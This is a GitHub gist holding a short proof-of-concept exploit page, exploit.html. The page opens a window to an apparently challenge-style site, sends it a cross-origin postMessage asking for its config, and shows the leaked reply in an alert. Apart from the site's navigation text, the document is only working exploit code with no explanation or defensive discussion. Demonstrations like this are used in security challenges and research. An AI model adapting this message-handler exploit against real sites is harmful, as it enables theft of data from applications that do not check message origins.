Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
exploit.html
<html>
<head>
<script>
const run = () => {
pwn.postMessage(JSON.stringify({ key: 'GET CONFIG' }), "*")
}
document.addEventListener('DOMContentLoaded', () => {
pwn = window.open('https://challengemenow.now.sh')
window.addEventListener('message', (event) => {
alert(JSON.stringify(event.data))
}, false)
setTimeout(run, 5000)
})
</script>
</head>
<body>
<p>This page demonstrates the exploit, please wait 5 seconds…</p>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment